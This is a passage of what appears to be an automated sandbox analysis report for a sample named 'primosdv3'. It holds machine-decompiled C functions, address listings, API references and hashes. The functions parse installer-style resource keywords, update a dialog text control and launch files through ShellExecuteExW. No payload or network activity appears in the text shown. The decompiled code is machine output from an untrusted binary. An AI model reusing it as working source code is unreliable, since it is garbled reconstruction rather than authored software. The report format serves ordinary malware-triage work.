											E00C705A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
											E00C70580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
											E00C705A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
											_t318 = E00C86159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E00C6D780);
											_t473 = _t473 + 0x14;
											__eflags = _t318;
											if(_t318 != 0) {
												_t322 =  *_t318 * 0xc;
												__eflags = _t322;
												_t156 = _t322 + 0xc9e270; // 0x28b64ee0
												_t468[0xb] =  *_t156;
											}
											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
											__eflags = _t268;
											_t421 = _t468[0x13];
											while(1) {
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												L71:
												__eflags = _t443 - _t468[0xf];
												if(_t443 != _t468[0xf]) {
													_t468[0x15] = _t268;
													goto L107;
												}
												L72:
												_t268 = _t268 + 1;
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												goto L71;
											}
										}
										_t453 = _t468[0x15];
										_t324 = _t268 | 0xffffffff;
										__eflags = _t324;
										_t466 = _t372;
										_t468[0xd] = _t324;
										_t374 = _t468[0x13];
										 *_t468 = L"STRINGS";
										_t468[1] = L"DIALOG";
										_t468[2] = L"MENU";
										_t468[3] = L"DIRECTION";
										do {
											_t468[0x10] = E00C83E13(_t468[_t466]);
											_t326 = E00C86088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
											_t473 = _t473 + 0x10;
											__eflags = _t326;
											if(_t326 != 0) {
												L47:
												_t424 = _t468[0xd];
												goto L48;
											}
											_t346 =  &(_t468[0x10][_t453]);
											_t430 = 0x20;
											__eflags = _t374[2 + _t346 * 2] - _t430;
											if(_t374[2 + _t346 * 2] > _t430) {
												goto L47;
											}
											_t424 = _t466;
											_t453 = _t346 + 1;
											_t468[0xd] = _t424;
											L48:
											_t466 = _t466 + 1;
											__eflags = _t466 - 4;
										} while (_t466 < 4);
										_t462 = _t468[0xc];
										_t372 = 0;
										_t468[0x15] = _t453;
										_t450 = _t468[0x11];
										__eflags = _t424;
										if(__eflags != 0) {
											_t268 = _t468[0x15];
											_t399 = _t468[0x13];
											if(__eflags <= 0) {
												goto L65;
											} else {
												goto L53;
											}
											while(1) {
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												L54:
												__eflags = _t455 - _t468[0xf];
												if(_t455 != _t468[0xf]) {
													_t468[0x15] = _t268;
													_t425 = _t372;
													_t456 = 0x20;
													__eflags = ( *_t443 & 0x0000ffff) - _t456;
													_t468[0x10] = _t372;
													_t450 = _t468[0x11];
													if(( *_t443 & 0x0000ffff) <= _t456) {
														L60:
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
														E00C71DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
														_t333 = _t468[0xd];
														__eflags = _t333 - 3;
														if(_t333 != 3) {
															__eflags = _t333 - 1;
															_t334 = "$%s:";
															if(_t333 != 1) {
																_t334 = "@%s:";
															}
															E00C6E5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
															_t473 = _t473 + 0x10;
														} else {
															_t338 = E00C83E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
															asm("sbb al, al");
															_t468[0xe][0x64] =  ~_t338 + 1;
														}
														L51:
														_t268 = _t468[0x15];
														goto L107;
													} else {
														goto L57;
													}
													while(1) {
														L57:
														__eflags = _t425 - 0x63;
														if(_t425 >= 0x63) {
															break;
														}
														_t341 =  *_t443;
														_t443 = _t443 + 2;
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
														_t425 = _t425 + 1;
														_t342 = 0x20;
														__eflags =  *_t443 - _t342;
														if( *_t443 > _t342) {
															continue;
														}
														break;
													}
													_t468[0x10] = _t425;
													goto L60;
												}
												L55:
												_t268 = _t268 + 1;
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												goto L54;
											}
										}
										E00C705A7(_t468 - 0x108, 0xc939d0, 0x64);
										goto L51;
									}
									__eflags = _t444 - _t468[5];
									if(_t444 != _t468[5]) {
										goto L75;
									}
									goto L42;
									L107:
									__eflags = _t268 - _t468[0x12];
								} while (_t268 < _t468[0x12]);
								_t392 = _t468[0xb];
								goto L109;
							} else {
								L00C83E2E(_t461);
								goto L125;
							}
						}
						_t389 = _t385 >> 1;
						_t468[0x12] = _t389;
						goto L33;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00C6E261(_t459, _t443, _t447);
					E00C6E261(_t459 + 0x14, _t443, _t447);
					_t447 = _t447 + 1;
					_t478 = _t447 -  *0xc9e720; // 0x64
					if(_t478 < 0) {
						goto L5;
					} else {
						_t372 = 0;
						goto L7;
					}
				}
			}

0x00c6da67
0x00c6da68
0x00c6da70
0x00c6da7a
0x00c6da84
0x00c6da85
0x00c6da86
0x00c6da89
0x00c6da8b
0x00c6da8e
0x00c6da91
0x00c6da97
0x00c6da99
0x00c6da9c
0x00c6daa2
0x00c6dade
0x00c6daa4
0x00c6daac
0x00c6dac4
0x00c6dace
0x00c6dace
0x00c6dae9
0x00c6daee
0x00c6daf6
0x00c6daf9
0x00c6db07
0x00c6e242
0x00c6e248
0x00c6e252
0x00c6e25a
0x00c6e25e
0x00c6db0d
0x00c6db0d
0x00c6db0f
0x00c6db15
0x00c6db33
0x00c6db3f
0x00c6db51
0x00c6db56
0x00c6db59
0x00c6db5c
0x00c6db5f
0x00c6db62
0x00c6db71
0x00c6db76
0x00c6db8b
0x00c6db90
0x00c6db93
0x00c6db95
0x00c6db95
0x00c6db98
0x00c6db9d
0x00c6dc5a
0x00c6dc5a
0x00c6dc5d
0x00c6dc6e
0x00c6dc76
0x00c6dc77
0x00c6dc7a
0x00c6dc7f
0x00000000
0x00000000
0x00c6dc85
0x00c6dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6dbb7
0x00c6dbc7
0x00c6dbcc
0x00c6dbd1
0x00c6dc52
0x00c6dc52
0x00c6dc55
0x00000000
0x00c6dbd3
0x00c6dbd3
0x00c6dbd3
0x00c6dbd6
0x00c6dbd8
0x00c6dbe1
0x00c6dc0c
0x00c6dc14
0x00c6dc40
0x00c6dc40
0x00c6dc44
0x00000000
0x00c6dc46
0x00c6dc46
0x00c6dba3
0x00c6dbab
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6dbab
0x00c6dc20
0x00c6dc30
0x00c6dc35
0x00c6dc3a
0x00000000
0x00000000
0x00000000
0x00c6dc3a
0x00c6dc14
0x00c6dbe9
0x00c6dbef
0x00c6dc00
0x00c6dc05
0x00c6dc0a
0x00c6dc4e
0x00000000
0x00c6dc4e
0x00c6dc0a
0x00000000
0x00c6dbef
0x00c6dc97
0x00c6dc9a
0x00c6dc9f
0x00c6dca9
0x00c6dcab
0x00c6dcaf
0x00c6dcb1
0x00000000
0x00000000
0x00c6dcc3
0x00c6dcc8
0x00c6dccc
0x00c6dcce
0x00c6dcd1
0x00c6dce1
0x00c6dce7
0x00c6dcea
0x00c6dcec
0x00000000
0x00000000
0x00c6dcf8
0x00c6dcfe
0x00c6dd04
0x00c6dd0a
0x00c6dd0d
0x00c6dd0f
0x00c6dd12
0x00c6dd12
0x00c6dd17
0x00c6dd19
0x00c6dd1b
0x00c6dd1b
0x00c6dd21
0x00c6dd31
0x00c6dd36
0x00c6dd40
0x00c6dd42
0x00c6dd46
0x00c6dd48
0x00c6dd56
0x00c6dd5a
0x00c6dd5c
0x00c6dd5e
0x00c6dd61
0x00c6dd63
0x00c6dd66
0x00c6dd69
0x00c6dd6c
0x00c6dd73
0x00c6dd7a
0x00c6e15c
0x00c6e15c
0x00c6e160
0x00c6e1e0
0x00c6e1e3
0x00c6e1e6
0x00c6e1ee
0x00c6e1f3
0x00c6e1f8
0x00c6e1fb
0x00c6e214
0x00c6e221
0x00c6e228
0x00c6e23a
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6e1fd
0x00c6e1fd
0x00c6e200
0x00c6e209
0x00c6e20e
0x00c6e20f
0x00c6e20f
0x00000000
0x00c6e1fd
0x00c6e165
0x00c6e16e
0x00c6e171
0x00c6e172
0x00c6e174
0x00c6e1af
0x00c6e1b1
0x00c6e1b7
0x00c6e1b8
0x00c6e1bb
0x00c6e1bd
0x00c6e1bd
0x00c6e1ca
0x00c6e1d0
0x00c6e1d1
0x00c6e1d2
0x00c6e1d3
0x00c6e1d9
0x00000000
0x00c6e1d9
0x00c6e176
0x00c6e17b
0x00c6e17e
0x00c6e17f
0x00c6e17f
0x00c6e182
0x00c6e185
0x00000000
0x00000000
0x00c6e187
0x00c6e18b
0x00000000
0x00000000
0x00c6e18d
0x00c6e18d
0x00c6e18f
0x00c6e192
0x00c6e195
0x00c6e195
0x00c6e195
0x00c6e19a
0x00c6e19c
0x00c6e1a0
0x00c6e1a1
0x00c6e1a6
0x00c6e1a8
0x00c6e1aa
0x00c6e1aa
0x00c6e1a6
0x00000000
0x00c6e19c
0x00c6dd80
0x00c6dd87
0x00c6dd8e
0x00c6dd8e
0x00c6dd91
0x00c6dd93
0x00c6e02a
0x00c6e02a
0x00c6e02e
0x00c6e02f
0x00c6e032
0x00c6e035
0x00000000
0x00000000
0x00c6e03b
0x00c6e03f
0x00c6e092
0x00c6e093
0x00c6e096
0x00c6e0b6
0x00c6e0b6
0x00c6e0ba
0x00c6e145
0x00c6e145
0x00c6e148
0x00c6e14a
0x00c6e14d
0x00c6e14d
0x00000000
0x00c6e14d
0x00c6e0c3
0x00c6e0cf
0x00c6e0d2
0x00c6e0d3
0x00c6e0d5
0x00c6e110
0x00c6e112
0x00c6e118
0x00c6e119
0x00c6e11c
0x00c6e11e
0x00c6e11e
0x00c6e131
0x00c6e137
0x00c6e138
0x00c6e139
0x00c6e13a
0x00c6e13f
0x00c6e142
0x00000000
0x00c6e142
0x00c6e0d7
0x00c6e0dc
0x00c6e0df
0x00c6e0e0
0x00c6e0e0
0x00c6e0e3
0x00c6e0e6
0x00000000
0x00000000
0x00c6e0e8
0x00c6e0ec
0x00000000
0x00000000
0x00c6e0ee
0x00c6e0ee
0x00c6e0f0
0x00c6e0f3
0x00c6e0f6
0x00c6e0f6
0x00c6e0f6
0x00c6e0fb
0x00c6e0fd
0x00c6e101
0x00c6e102
0x00c6e107
0x00c6e109
0x00c6e10b
0x00c6e10b
0x00c6e107
0x00000000
0x00c6e0fd
0x00c6e09a
0x00c6e09b
0x00c6e09e
0x00000000
0x00000000
0x00c6e0a0
0x00c6e0a6
0x00000000
0x00000000
0x00c6e0ac
0x00c6e0ac
0x00c6e0b0
0x00000000
0x00c6e0b0
0x00c6e041
0x00c6e047
0x00000000
0x00000000
0x00c6e051
0x00c6e051
0x00c6e054
0x00c6e07b
0x00c6e07d
0x00c6e07d
0x00c6e07e
0x00c6e085
0x00c6e086
0x00c6e089
0x00000000
0x00c6e089
0x00c6e056
0x00c6e056
0x00c6e059
0x00c6e077
0x00000000
0x00c6e077
0x00c6e05b
0x00c6e05b
0x00c6e05e
0x00c6e073
0x00000000
0x00c6e073
0x00c6e060
0x00c6e060
0x00c6e063
0x00c6e06f
0x00000000
0x00c6e06f
0x00c6e066
0x00c6e069
0x00000000
0x00000000
0x00c6e06b
0x00000000
0x00c6e06b
0x00c6dd99
0x00c6dd9e
0x00c6dda2
0x00c6ddae
0x00c6ddb0
0x00c6ddb1
0x00c6ddb5
0x00c6df29
0x00c6df2c
0x00c6df33
0x00c6df38
0x00c6df3a
0x00c6e024
0x00c6e024
0x00c6e027
0x00000000
0x00c6e027
0x00c6df4c
0x00c6df5d
0x00c6df62
0x00c6df67
0x00c6df69
0x00000000
0x00000000
0x00c6df71
0x00c6df84
0x00c6df99
0x00c6dfae
0x00c6dfc0
0x00c6dfdb
0x00c6dfe0
0x00c6dfe3
0x00c6dfe5
0x00c6dfe7
0x00c6dfe7
0x00c6dfea
0x00c6dff0
0x00c6dff0
0x00c6e004
0x00c6e004
0x00c6e006
0x00c6e009
0x00c6e009
0x00c6e00d
0x00c6e011
0x00000000
0x00000000
0x00c6e013
0x00c6e013
0x00c6e017
0x00c6e01c
0x00000000
0x00c6e01c
0x00c6e019
0x00c6e019
0x00c6e009
0x00c6e00d
0x00c6e011
0x00000000
0x00000000
0x00000000
0x00c6e011
0x00c6e009
0x00c6ddbb
0x00c6ddbe
0x00c6ddbe
0x00c6ddc1
0x00c6ddc3
0x00c6ddc6
0x00c6ddc9
0x00c6ddd0
0x00c6ddd7
0x00c6ddde
0x00c6dde5
0x00c6ddf6
0x00c6ddfd
0x00c6de02
0x00c6de05
0x00c6de07
0x00c6de22
0x00c6de22
0x00000000
0x00c6de22
0x00c6de0c
0x00c6de10
0x00c6de11
0x00c6de16
0x00000000
0x00000000
0x00c6de18
0x00c6de1a
0x00c6de1d
0x00c6de25
0x00c6de25
0x00c6de26
0x00c6de26
0x00c6de2b
0x00c6de2e
0x00c6de30
0x00c6de33
0x00c6de36
0x00c6de38
0x00c6de55
0x00c6de58
0x00c6de5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6de61
0x00c6de61
0x00c6de61
0x00c6de64
0x00c6de67
0x00c6de6b
0x00000000
0x00000000
0x00c6de6d
0x00c6de6d
0x00c6de71
0x00c6de78
0x00c6de7b
0x00c6de80
0x00c6de81
0x00c6de84
0x00c6de87
0x00c6de8a
0x00c6deab
0x00c6dead
0x00c6dec5
0x00c6decd
0x00c6ded0
0x00c6ded3
0x00c6ded6
0x00c6defc
0x00c6deff
0x00c6df04
0x00c6df06
0x00c6df06
0x00c6df1c
0x00c6df21
0x00c6ded8
0x00c6dee4
0x00c6def0
0x00c6def4
0x00c6def4
0x00c6de4d
0x00c6de4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6de8c
0x00c6de8c
0x00c6de8c
0x00c6de8f
0x00000000
0x00000000
0x00c6de91
0x00c6de94
0x00c6de97
0x00c6de9f
0x00c6dea2
0x00c6dea3
0x00c6dea6
0x00000000
0x00000000
0x00000000
0x00c6dea6
0x00c6dea8
0x00000000
0x00c6dea8
0x00c6de73
0x00c6de73
0x00c6de61
0x00c6de61
0x00c6de64
0x00c6de67
0x00c6de6b
0x00000000
0x00000000
0x00000000
0x00c6de6b
0x00c6de61
0x00c6de48
0x00000000
0x00c6de48
0x00c6dda4
0x00c6dda8
0x00000000
0x00000000
0x00000000
0x00c6e150
0x00c6e150
0x00c6e150
0x00c6e159
0x00000000
0x00c6dd4a
0x00c6dd4b
0x00000000
0x00c6dd50
0x00c6dd48
0x00c6dcd3
0x00c6dcd5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6db17
0x00c6db1a
0x00c6db23
0x00c6db28
0x00c6db29
0x00c6db2f
0x00000000
0x00c6db31
0x00c6db31
0x00000000
0x00c6db31
0x00c6db2f

APIs

__EH_prolog.LIBCMT ref: 00C6DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C6DAAC

Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2

Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0

Part of subcall function 00C71B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C6BAE9,00000000,?,?,?,000302C4), ref: 00C71BA0

_wcslen.LIBCMT ref: 00C6DDE9
__fprintf_l.LIBCMT ref: 00C6DF1C

Strings

R, xrefs: 00C6DC0C
a, xrefs: 00C6DC16
,, xrefs: 00C6DF57
*messages***, xrefs: 00C6DBC1
, xrefs: 00C6DD6C
*messages***, xrefs: 00C6DBFA
@%s:, xrefs: 00C6DF06, 00C6DF12
RTL, xrefs: 00C6DEDE
$%s:, xrefs: 00C6DEFF

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 05f217333ea65c3e5524013c91bc5cb3e0ee625e4635a5a9278db4924d21cf4b
Instruction ID: 3c62a0b2e41153fd6de1ac290ba0b68692df00f11c231fb2f4084881bae186ec
Opcode Fuzzy Hash: 05f217333ea65c3e5524013c91bc5cb3e0ee625e4635a5a9278db4924d21cf4b
Instruction Fuzzy Hash: C332F175A00218EBCF34EF68C885BEE77A5FF05704F40016AF9169B281EBB19E85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C7D4D4() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00C7B568(); // executed
				_t46 = GetDlgItem( *0xca8458, 0x68);
				_t49 =  *0xca8463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xca8440; // 0x0
					E00C79285(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xc935f4);
					 *0xca8463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x00c7d4db
0x00c7d4f5
0x00c7d4fa
0x00c7d500
0x00c7d502
0x00c7d508
0x00c7d510
0x00c7d51b
0x00c7d529
0x00c7d52f
0x00c7d52f
0x00c7d53f
0x00c7d549
0x00c7d559
0x00c7d561
0x00c7d565
0x00c7d56a
0x00c7d570
0x00c7d57b
0x00c7d585
0x00c7d58d
0x00c7d58d
0x00c7d59d
0x00c7d5ab
0x00c7d5ba
0x00c7d5c2
0x00c7d5d0
0x00c7d5e1
0x00c7d5e1
0x00c7d5fd

APIs

Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
Part of subcall function 00C7B568: IsDialogMessageW.USER32(000302C4,?), ref: 00C7B59E
Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6

GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0

Strings

\, xrefs: 00C7D549

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
Instruction ID: 70e4ac23f4480e7ad503e506b89e44e629ec61fe448c643190e59bf30ea80e77
Opcode Fuzzy Hash: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
Instruction Fuzzy Hash: 4831B372145382AFE301EF20EC4AFAF7FACEB8A748F008518F55196191DB659A088776

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00C7D78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				long _v12;
				void* __edi;
				int _t47;
				signed int _t50;
				void* _t51;
				signed short* _t53;
				long _t64;
				signed int _t71;
				void* _t72;
				signed short _t73;
				int _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t78;
				long _t80;
				signed int _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				signed short* _t87;
				struct HWND__* _t88;
				void* _t89;
				void* _t92;

				_t89 = __ebp;
				_t47 = E00C7EC50(0x1040);
				_t87 = _a4168;
				_t74 = 0;
				if( *_t87 == 0) {
					L54:
					return _t47;
				}
				_t47 = E00C83E13(_t87);
				if(_t47 >= 0x7f6) {
					goto L54;
				} else {
					_t80 = 0x3c;
					E00C7FFF0(_t80,  &_a4, 0, _t80);
					_t78 = _a4176;
					_t92 = _t92 + 0xc;
					_a4.cbSize = _t80;
					_a8 = 0x1c0;
					if(_t78 != 0) {
						_a8 = 0x5c0;
					}
					_t50 =  *_t87 & 0x0000ffff;
					_push(_t89);
					_t76 = 0x22;
					_t81 = _t50;
					_t77 = _t74;
					if(_t50 != _t76) {
						_t90 = _t87;
						_a20 = _t87;
						goto L16;
					} else {
						_t90 =  &(_t87[1]);
						_a20 =  &(_t87[1]);
						L6:
						_t51 = 0x22;
						if(_t81 != _t51) {
							L13:
							_t82 = 0x20;
							_t53 =  &(( &(_t87[1]))[_t77]);
							if(_t87[_t77] == _t82) {
								_t87[_t77] = 0;
								L48:
								_a24 = _t53;
								L18:
								if(_t53 == 0 ||  *_t53 == _t74) {
									if(_t78 == 0 &&  *0xcab472 != _t74) {
										_a24 = 0xcab472;
									}
								}
								_a32 = _a4172;
								_t84 = E00C6B92D(_t90);
								if(_t84 != 0 && E00C71FBB(_t84, L".inf") == 0) {
									_a16 = L"Install";
								}
								if(E00C6A231(_a20) != 0) {
									E00C6B6C4(_a20,  &_a64, 0x800);
									_a8 =  &_a52;
								}
								_t47 = ShellExecuteExW( &_a4); // executed
								if(_t47 != 0) {
									_t88 = _a4160;
									if( *0xca9468 != _t74 || _a4172 != _t74 ||  *0xcb7b7a != _t74) {
										if(_t88 != 0) {
											_push(_t88);
											if( *0xcc30a8() != 0) {
												ShowWindow(_t88, _t74);
												_t74 = 1;
											}
										}
										 *0xcc30a4(_a56, 0x7d0);
										E00C7DC3B(_a48);
										if( *0xcb7b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
											_t64 = _v12;
											if(_t64 >  *0xcbfca4) {
												 *0xcbfca4 = _t64;
											}
											 *0xcb7b7b = 1;
										}
									}
									CloseHandle(_a48);
									if(_t84 == 0 || E00C71FBB(_t84, L".exe") != 0) {
										_t47 = _a4164;
										if( *0xca9468 != 0 && _t47 == 0 &&  *0xcb7b7a == _t47) {
											 *0xcbfca8 = 0x1b58;
										}
									} else {
										_t47 = _a4164;
									}
									if(_t74 != 0 && _t47 != 0) {
										_t47 = ShowWindow(_t88, 1);
									}
								}
								goto L54;
							}
							if( *_t53 == 0x2f) {
								goto L48;
							}
							_t77 = _t77 + 1;
							_t50 = _t87[_t77] & 0x0000ffff;
							_t81 = _t50;
							L16:
							if(_t50 != 0) {
								goto L6;
							}
							_t53 = _a24;
							goto L18;
						} else {
							while(1) {
								_t77 = _t77 + 1;
								_t71 = _t87[_t77] & 0x0000ffff;
								_t86 = _t71;
								if(_t71 == 0) {
									break;
								}
								_t72 = 0x22;
								if(_t86 == _t72) {
									_t73 = 0x20;
									_t87[_t77] = _t73;
									goto L13;
								}
							}
							goto L13;
						}
					}
				}
			}

0x00c7d78f
0x00c7d794
0x00c7d79b
0x00c7d7a2
0x00c7d7a7
0x00c7d9ea
0x00c7d9f0
0x00c7d9f0
0x00c7d7ae
0x00c7d7b9
0x00000000
0x00c7d7bf
0x00c7d7c2
0x00c7d7ca
0x00c7d7cf
0x00c7d7d6
0x00c7d7d9
0x00c7d7dd
0x00c7d7e7
0x00c7d7e9
0x00c7d7e9
0x00c7d7f1
0x00c7d7f4
0x00c7d7f7
0x00c7d7fb
0x00c7d7fd
0x00c7d7ff
0x00c7d812
0x00c7d814
0x00000000
0x00c7d801
0x00c7d801
0x00c7d804
0x00c7d808
0x00c7d80a
0x00c7d80e
0x00c7d837
0x00c7d839
0x00c7d83d
0x00c7d844
0x00c7d9c2
0x00c7d9c6
0x00c7d9c6
0x00c7d864
0x00c7d866
0x00c7d86f
0x00c7d87a
0x00c7d87a
0x00c7d86f
0x00c7d88a
0x00c7d893
0x00c7d898
0x00c7d8a9
0x00c7d8a9
0x00c7d8bc
0x00c7d8cc
0x00c7d8d5
0x00c7d8d5
0x00c7d8de
0x00c7d8e6
0x00c7d8ec
0x00c7d8f9
0x00c7d90e
0x00c7d910
0x00c7d919
0x00c7d91d
0x00c7d923
0x00c7d923
0x00c7d919
0x00c7d92e
0x00c7d938
0x00c7d944
0x00c7d963
0x00c7d96d
0x00c7d96f
0x00c7d96f
0x00c7d974
0x00c7d974
0x00c7d944
0x00c7d97f
0x00c7d987
0x00c7d99f
0x00c7d9a6
0x00c7d9b4
0x00c7d9b4
0x00c7d9cf
0x00c7d9cf
0x00c7d9cf
0x00c7d9d8
0x00c7d9e1
0x00c7d9e1
0x00c7d9d8
0x00000000
0x00c7d9e7
0x00c7d84e
0x00000000
0x00000000
0x00c7d854
0x00c7d855
0x00c7d859
0x00c7d85b
0x00c7d85e
0x00000000
0x00000000
0x00c7d860
0x00000000
0x00c7d810
0x00c7d822
0x00c7d822
0x00c7d823
0x00c7d827
0x00c7d82c
0x00000000
0x00000000
0x00c7d81c
0x00c7d820
0x00c7d832
0x00c7d833
0x00000000
0x00c7d833
0x00c7d820
0x00000000
0x00c7d82e
0x00c7d80e
0x00c7d7ff

APIs

_wcslen.LIBCMT ref: 00C7D7AE
ShellExecuteExW.SHELL32(?), ref: 00C7D8DE
ShowWindow.USER32(?,00000000), ref: 00C7D91D
GetExitCodeProcess.KERNEL32 ref: 00C7D959
CloseHandle.KERNEL32(?), ref: 00C7D97F
ShowWindow.USER32(?,00000001), ref: 00C7D9E1

Strings
